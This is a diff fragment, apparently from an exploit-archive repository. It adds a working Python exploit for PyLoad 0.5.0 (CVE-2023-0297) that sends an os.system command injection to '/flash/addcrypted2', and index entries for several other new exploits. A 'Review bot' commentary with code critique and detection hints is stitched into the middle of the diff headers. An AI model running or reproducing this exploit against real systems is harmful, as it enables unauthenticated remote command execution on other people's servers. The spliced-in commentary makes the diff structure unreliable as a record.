+parser = argparse.ArgumentParser()
+parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
+parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
+arguments = parser.parse_args()
+
+def doRequest(url):
+ try:
+ res = requests.get(url)
+ if res.status_code == 200:
+ return True
+ else:
+ return False
+
+ except requests.exceptions.RequestException as e:
+ print("[!] Maybe the host is offline :", e)
+ exit()
+
+def runExploit(url, cmd):
+ endpoint = url + '/flash/addcrypted2'
+ if " " in cmd:
+ validCommand = cmd.replace(" ", "%20")
+ else:
+ validCommand = cmd
+
+ payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
+ test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
+ print('[+] The exploit has be executeded in target machine. ')
+
+def main(targetUrl, Command):
+ print('[+] Check if target host is alive: ' + targetUrl)
+ alive = doRequest(targetUrl)
+ if alive == True:
+ print("[+] Host up, let's exploit! ")
+ runExploit(targetUrl,Command)
+ else:
+ print('[-] Host down! ')
+
+if(arguments.url != None and arguments.cmd != None):
+ targetUrl = arguments.url
+ Command = arguments.cmd
+ main(targetUrl, Command)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1eedeac46..992faea35 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
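Review bot: `exit()` at the end of `doRequest` is the interactive-site helper rather than `sys.exit()`, and the guard `if(arguments.url != None and arguments.cmd != None):` is redundant because both options are declared `required=True` and argparse has already rejected a missing one; both are style points, as is the combined `import requests, argparse` line. In `runExploit` the success message `[+] The exploit has be executeded in target machine.` is printed without ever looking at `test`, so it is both misspelled and unconditional, and `requests.get(url)` in `doRequest` carries no `timeout=`, so an unresponsive host blocks indefinitely instead of reaching the `RequestException` branch. From the defender's side the hunk documents what to look for: a POST to `/flash/addcrypted2` whose `jk=` parameter contains `pyimport`, which the path alone makes visible in web-server access logs and which a request-inspecting proxy can match; the header's `CVE-2023-0297` is the identifier to track the vendor fix against, and the script itself should state the fixed version next to it.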
@@ -3311,6 +3311,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware,,2013-01-03,2016-12-04,0,OSVDB-88921,,,,, 21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware,,2001-12-20,2012-09-11,1,CVE-2002-0209;OSVDB-3964,,,,,https://www.securityfocus.com/bid/3964/info 31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware,,2014-02-07,2014-02-07,1,CVE-2013-4710;OSVDB-97520,"Metasploit Framework (MSF)",,,,https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview +51516,exploits/hardware/remote/51516.txt,"Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, +51515,exploits/hardware/remote/51515.txt,"Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, +51514,exploits/hardware/remote/51514.txt,"Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, 33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info 33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info 33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin 
Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info @@ -23467,6 +23470,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80,2015-09-11,2015-09-11,0,OSVDB-127474;OSVDB-127473,,,,http://www.exploit-db.comMonsta-FTP-master.zip, 27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1781;OSVDB-24650,,,,,https://www.securityfocus.com/bid/17546/info 3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php,,2007-03-19,2016-09-29,1,CVE-2006-1781,,,,, +51519,exploits/php/webapps/51519.txt,"Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,, 38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,,2013-09-20,2018-03-01,1,OSVDB-97526,,,,,https://www.securityfocus.com/bid/62572/info 37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,,2012-08-23,2018-03-01,1,OSVDB-84839,,,,,https://www.securityfocus.com/bid/55171/info 39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80,2016-03-28,2016-03-28,0,,,,,http://www.exploit-db.commonstra-3.0.3.zip, 
@@ -24760,6 +24764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,,
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,,
 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,,
+51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,,
 50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,,
@@ -28102,8 +28107,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
+51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
@@ -30490,6 +30497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,,2021-06-10,2021-06-10,0,,,,,http://www.exploit-db.comtextpattern-4.8.7.zip,
 49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
+51523,exploits/php/webapps/51523.txt,"Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php,,2006-12-19,,1,OSVDB-32381;CVE-2006-6686,,,,,
 25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php,,2005-07-18,2013-06-07,1,,,,,,https://www.securityfocus.com/bid/14303/info
 1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php,,2006-03-24,2016-06-30,1,OSVDB-24164;CVE-2006-1412,,,,http://www.exploit-db.comtftgallery-0.10.zip,
@@ -33991,6 +33999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43827,exploits/php/webapps/43827.txt,"XOOPS < 2.0.11 - Multiple Vulnerabilities",2015-06-29,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00079;CVE-2005-2112;CVE-2005-2113,,,,,http://gulftech.org/advisories/XOOPS%20Multiple%20Vulnerabilities/79
 9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php,,2009-07-23,,1,OSVDB-56598;CVE-2009-4714;OSVDB-56597;CVE-2009-4713;OSVDB-56596;OSVDB-56595;CVE-2009-4698;OSVDB-56594;OSVDB-56593,,,,,
 9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php,,2009-07-26,2016-10-27,1,CVE-2009-4698;OSVDB-56595;OSVDB-56594;OSVDB-56593,,,,,
+51520,exploits/php/webapps/51520.txt,"Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
 37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php,,2012-06-12,2015-06-26,1,,,,,,https://www.securityfocus.com/bid/53945/info
 3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php,,2007-05-03,,1,OSVDB-34472;CVE-2007-2543,,,,,
 39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,CVE-2014-3935;OSVDB-107104,,,,,https://www.securityfocus.com/bid/67460/info
@@ -34516,6 +34525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
+51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,